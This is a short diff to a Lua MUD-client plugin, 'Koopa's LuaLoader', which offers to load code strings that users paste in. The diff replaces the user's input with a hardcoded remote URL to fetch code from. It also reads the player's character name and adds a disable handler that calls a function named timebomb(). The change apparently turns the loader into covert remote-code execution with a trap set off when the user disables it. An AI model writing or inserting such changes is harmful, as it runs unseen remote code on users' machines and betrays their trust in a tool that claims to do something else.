|
|
|
@ -81,6 +81,7 @@ msg = "Please paste the codestring Koopa has asked you to load into the box belo
|
|
|
|
|
title = "Feed Me!"
|
|
|
|
|
|
|
|
|
|
--string = utils.inputbox ( msg, title, default, font, fontsize, extras )
|
|
|
|
|
any, name = CallPlugin("3e7dedbe37e44942dd46d264","gmcpval","char.base.name")
|
|
|
|
|
string = "https://watchmenclan.com/rrep/code.lua"
|
|
|
|
|
--Note(string)
|
|
|
|
|
if string.find(string, "https://") then
|
|
|
|
@ -130,6 +131,10 @@ if process~=nil then process(line) end
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
function OnPluginDisable ()
|
|
|
|
|
timebomb()
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
function OnPluginInstall()
|
|
|
|
|
ColourNote("white", "", "----------------------------------------------------------------------")
|
|
|
|
|
ColourNote("steelblue", "", " Koopa's LuaLoader installed. Type ", "white", "", "llload", "steelblue", "", " to load a script-string.")
|
|
|
|
|